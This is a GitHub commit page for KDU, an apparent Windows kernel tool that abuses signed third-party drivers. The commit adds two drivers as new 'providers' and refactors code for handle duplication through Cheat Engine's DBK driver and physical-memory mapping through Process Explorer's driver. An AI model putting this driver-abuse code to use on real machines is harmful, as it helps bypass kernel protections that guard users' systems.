v 1.3.2

Added Pavel Yosifovich "KObjExp" driver as provider 37 Added Pavel Yosifovich "KRegExp" driver as provider 38 Readme update
hfiref0x · Jun 10, 2023 · a407db2 · a407db2
1 parent 0a3e2f4
commit a407db2
Show file tree

Hide file tree

Showing 70 changed files with 1,178 additions and 248 deletions.
diff --git a/KDU.sha256 b/KDU.sha256
diff --git a/README.md b/README.md
@@ -141,6 +141,8 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
 | 34          | MSI            | winio       | MSI Foundation Service             | WINIO             | Undefined                   |                      |
 | 35          | HP             | EtdSupport  | ETDi Support Driver                | Original          | 18.0 and below              |                      |
 | 36          | Pavel Yosifovich | KExplore  | Kernel Explorer                | Original          | Undefined              |                      |
+| 37          | Pavel Yosifovich | KObjExp  | Kernel Object Explorer          | Original          | Undefined              |                      |
+| 38          | Pavel Yosifovich | KRegExp  | Kernel Registry Explorer        | Original          | Undefined              |                      |
 
 ###### *At commit time, data maybe inaccurate.
 

diff --git a/Source/Hamakaze/global.h b/Source/Hamakaze/global.h
@@ -77,6 +77,7 @@ extern "C" {
 #include "shared/consts.h"
 #include "shared/kdubase.h"
 #include "sig.h"
+#include "ipcsvc.h"
 #include "sup.h"
 #include "sym.h"
 #include "compress.h"
@@ -87,7 +88,6 @@ extern "C" {
 #include "ps.h"
 #include "pagewalk.h"
 #include "dsefix.h"
-#include "ipcsvc.h"
 #include "diag.h"
 #include "tests.h"
 

diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
@@ -4,9 +4,9 @@
 *
 *  TITLE:       DBK.CPP
 *
-*  VERSION:     1.31
+*  VERSION:     1.32
 *
-*  DATE:        09 Apr 2023
+*  DATE:        10 Jun 2023
 *
 *  Cheat Engine's DBK driver routines.
 *
@@ -21,8 +21,6 @@
 #include "idrv/dbk.h"
 #include "idrv/ldrsc.h"
 
-#define DBK_GET_HANDLE 0x1337
-
 #define DBK_LDR_DLL L"u.dll"
 #define DBK_KMU_EXE L"kernelmoduleunloader.exe"
 #define DBK_KMU_SIG L"kernelmoduleunloader.exe.sig"
@@ -67,83 +65,6 @@ NTSTATUS CALLBACK DbkSetupCheatEngineObjectNames(
     return ntStatus;
 }
 
-/*
-* DbkpIpcOnException
-*
-* Purpose:
-*
-* ALPC receive exception callback.
-*
-*/
-VOID CALLBACK DbkpIpcOnException(
-    _In_ ULONG ExceptionCode,
-    _In_opt_ PVOID UserContext
-)
-{
-    UNREFERENCED_PARAMETER(UserContext);
-
-    supPrintfEvent(kduEventError,
-        "[!] Exception 0x%lx thrown during IPC callback\r\n", ExceptionCode);
-}
-
-/*
-* DbkpIpcCallback
-*
-* Purpose:
-*
-* ALPC receive message callback.
-*
-*/
-VOID CALLBACK DbkpIpcCallback(
-    _In_ PCLIENT_ID ClientId,
-    _In_ PKDU_MSG Message,
-    _In_opt_ PVOID UserContext
-)
-{
-    KDU_CONTEXT* Context = (PKDU_CONTEXT)UserContext;
-
-    if (Context == NULL)
-        return;
-
-    __try {
-
-        if (Message->Function == DBK_GET_HANDLE &&
-            Message->Status == STATUS_SECRET_TOO_LONG &&
-            Message->ReturnedLength == sizeof(ULONG))
-        {
-            HANDLE hProcess = NULL, hNewHandle = NULL;
-            OBJECT_ATTRIBUTES obja;
-
-            InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
-
-            if (NT_SUCCESS(NtOpenProcess(&hProcess,
-                PROCESS_DUP_HANDLE | PROCESS_TERMINATE,
-                &obja,
-                ClientId)))
-            {
-                if (NT_SUCCESS(NtDuplicateObject(
-                    hProcess,
-                    (HANDLE)Message->Data,
-                    NtCurrentProcess(),
-                    &hNewHandle,
-                    0,
-                    0,
-                    DUPLICATE_SAME_ACCESS)))
-                {
-                    Context->DeviceHandle = hNewHandle;
-                }
-
-                NtTerminateProcess(hProcess, STATUS_TOO_MANY_SECRETS);
-                NtClose(hProcess);
-            }
-
-        }
-    }
-    __except (EXCEPTION_EXECUTE_HANDLER) {
-        return;
-    }
-}
-
 /*
 * DbkOpenCheatEngineDriver
 *
@@ -218,8 +139,8 @@ BOOL DbkOpenCheatEngineDriver(
             sizeof(g_KduLoaderShellcode),
             &memIO))
         {
-            ipcServer = IpcStartApiServer(DbkpIpcCallback,
-                DbkpIpcOnException,
+            ipcServer = IpcStartApiServer(supIpcDuplicateHandleCallback,
+                supIpcOnException,
                 NULL,
                 NULL,
                 (PVOID)Context);

diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp
@@ -4,9 +4,9 @@
 *
 *  TITLE:       PROCEXP.CPP
 *
-*  VERSION:     1.30
+*  VERSION:     1.32
 *
-*  DATE:        20 Mar 2023
+*  DATE:        10 Jun 2023
 *
 *  Process Explorer driver routines.
 *
@@ -36,40 +36,10 @@ static KDU_VICTIM_PROVIDER g_ProcExpVictimSelf{
         sizeof(g_ProcExpSig)              // Victim dispatch bytes size
 };
 
-/*
-* PexpMapMemory
-*
-* Purpose:
-*
-* Map physical memory.
-*
-*/
-PVOID PexpMapMemory(
-    _In_ ULONG_PTR PhysicalAddress,
-    _In_ ULONG NumberOfBytes,
-    _In_ BOOL MapForWrite
-)
-{
-    return supMapPhysicalMemory(g_PexPhysicalMemorySection,
-        PhysicalAddress,
-        NumberOfBytes,
-        MapForWrite);
-}
+#define PexpMapMemory(PhysicalAddress, NumberOfBytes, MapForWrite) \
+    supMapPhysicalMemory(g_PexPhysicalMemorySection, PhysicalAddress, NumberOfBytes, MapForWrite)
 
-/*
-* PexpUnmapMemory
-*
-* Purpose:
-*
-* Unmap physical memory.
-*
-*/
-VOID PexpUnmapMemory(
-    _In_ PVOID BaseAddress
-)
-{
-    supUnmapPhysicalMemory(BaseAddress);
-}
+#define PexpUnmapMemory(BaseAddress) supUnmapPhysicalMemory(BaseAddress)
 
 /*
 * PexpReadWritePhysicalMemory